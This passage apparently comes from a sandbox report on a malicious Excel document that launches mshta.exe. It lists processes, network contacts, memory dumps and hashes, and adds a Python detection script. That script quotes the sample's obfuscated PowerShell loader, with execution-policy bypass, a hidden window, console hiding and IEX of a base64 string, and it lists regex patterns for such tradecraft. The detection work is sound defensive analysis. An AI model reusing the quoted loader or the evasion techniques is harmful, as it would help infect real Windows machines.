| PID 4528 wrote to memory of 4236 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
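The behavioral2 run stops after EXCEL.EXE launches mshta.exe, which is the parent/child relation the "Process spawned unexpected child process" signature keys on. The following is an added example, not sandbox code: a small rule set over process-creation events in the shape of Sysmon Event ID 1 that flags an Office parent spawning a script host, a PowerShell command line carrying several of the switches and constructs seen in this report, PowerShell spawning the csc.exe / cvtres.exe pair that Add-Type uses to build a temporary assembly (clbffc8o.dll here), a script host running a script from the user profile, and a case-mangled executable name. The events are constructed from this report's process lists; only EXCEL.EXE (PID 4528) -> mshta.exe (PID 4236) is a relation the report states. The other parent links, PIDs 1000 and 3000-3003, and the explorer.exe -> EXCEL.EXE control event are assumed.

```python
import ntpath
import re

# Added example, not sandbox code: parent/child and command-line rules run over
# process-creation events shaped like Sysmon Event ID 1. The events below are built from
# this report's process lists; only EXCEL.EXE (PID 4528) -> mshta.exe (PID 4236) is a relation
# the report states. The other parent links, PIDs 1000 and 3000-3003, and the
# explorer.exe -> EXCEL.EXE control event are assumed for the example.

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
COMPILERS = {"csc.exe", "vbc.exe", "cvtres.exe"}   # Add-Type builds its temporary DLL through csc.exe, which runs cvtres.exe

# Switches and constructs present in the PowerShell command lines of the behavioral1 run.
POWERSHELL_INDICATORS = {
    "execution_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),   # -ex BYPASs, -executionpolicy bypass
    "hidden_window": re.compile(r"-w\w*\s+(?:1|hidden)\b", re.I),      # -W 1, -windowstyle hidden
    "no_profile": re.compile(r"-nop\w*\b", re.I),                       # -nOP, -NoProfile
    "char_cast": re.compile(r"\[char\]", re.I),                         # [CHar]58 string building
    "replace_chain": re.compile(r"-c?replace\b", re.I),                 # -cReplAce token swapping
    "base64_decode": re.compile(r"frombase64string", re.I),
    "webclient_download": re.compile(r"downloaddata|downloadstring", re.I),
    # DeviceCredentialDeployment.exe is a signed Windows binary that hides the console window of
    # the process that starts it; the report labels this "Evasion via Device Credential Deployment".
    "console_hide": re.compile(r"devicecredentialdeployment", re.I),
}


def first_token(cmdline: str) -> str:
    """The executable as written on the command line (quoted, or up to the first space)."""
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(" ", 1)[0]


def looks_case_mangled(name: str) -> bool:
    """True for names such as powerSHELl.eXE: three or more upper/lower flips between consecutive
    letters. Canonical names (powershell.exe, EXCEL.EXE, WScript.exe) stay below that."""
    letters = [c for c in name if c.isalpha()]
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips >= 3


def powershell_indicators(cmdline: str) -> list[str]:
    return [name for name, rx in POWERSHELL_INDICATORS.items() if rx.search(cmdline)]


def evaluate(event: dict) -> list[str]:
    """Names of the rules one event trips; an empty list means nothing to report."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    cmd = event["CommandLine"]
    hits = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    if image == "powershell.exe" and len(powershell_indicators(cmd)) >= 2:
        hits.append("powershell_suspicious_cmdline")
    if parent == "powershell.exe" and image in COMPILERS:
        hits.append("powershell_spawns_compiler")
    if image in {"wscript.exe", "cscript.exe"} and re.search(r"\\appdata\\", cmd, re.I):
        hits.append("script_host_runs_user_profile_script")
    if looks_case_mangled(ntpath.basename(first_token(cmd))):
        hits.append("case_mangled_image_name")
    return hits


def run(events: list[dict]) -> dict[int, list[str]]:
    return {e["ProcessId"]: evaluate(e) for e in events}


def ev(pid, ppid, image, parent, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


EVENTS = [
    # constructed benign control: Explorer opening the workbook
    ev(4528, 1000, r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE", r"C:\Windows\explorer.exe",
       r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls"'),
    # behavioral2: Excel spawns mshta.exe and writes to its memory
    ev(4236, 4528, r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE",
       r"C:\Windows\System32\mshta.exe -Embedding"),
    # behavioral1 command lines (base64 argument elided as on the page); parents assumed
    ev(3001, 3000, r"C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE", r"C:\Windows\SysWOW64\mshta.exe",
       r'''"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'...'+[cHar]34+'))')))"'''),
    ev(3002, 3001, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
       r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"'),
    ev(3003, 3001, r"C:\Windows\SysWOW64\WScript.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
       r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"'),
]

if __name__ == "__main__":
    for pid, hits in run(EVENTS).items():
        print(pid, hits or "-")
```

The Office-to-script-host rule alone would have caught this sample on both platforms, since it fires on the first child regardless of what the .hta does afterwards; the command-line indicators are there for the win7 chain, where mshta.exe is already allowed by some environments and the PowerShell stage is the first opportunity. The case-mangling check is deliberately crude (a flip count), so treat it as an enrichment signal rather than an alert on its own.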
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| FR | 52.109.68.129:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 129.68.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.178.46.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/4528-0-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-1-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp
memory/4528-3-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-2-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-5-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-4-0x00007FFED83B0000-0x00007FFED83C0000-memory.dmp
memory/4528-7-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-6-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-8-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-10-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-11-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-12-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp
memory/4528-9-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-13-0x00007FFED5CA0000-0x00007FFED5CB0000-memory.dmp
memory/4528-14-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-17-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-18-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-20-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-19-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-16-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-15-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-38-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-42-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-45-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4528-46-0x00007FFF183CD000-0x00007FFF183CE000-memory.dmp
memory/4528-47-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-51-0x00007FFF18330000-0x00007FFF18525000-memory.dmp
memory/4236-52-0x00007FF7321D0000-0x00007FF7321D8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 1db43076453e25110d16a8013d558fe4 |
| SHA1 | 20ad8372357cfa65ae3bcc38f448394c6c24d966 |
| SHA256 | 3e973311136c5bbed135265e2facc151547b9424856a31698c2b9bfb73a571b5 |
| SHA512 | 5e15a6d91c6a175cc92e5ceac2c98277df674aac82f7cdf1c6d9222f945044b00666bb1efd6485384efc1791bad09086f178baf76c7096d7cc9bb9b5df150355 |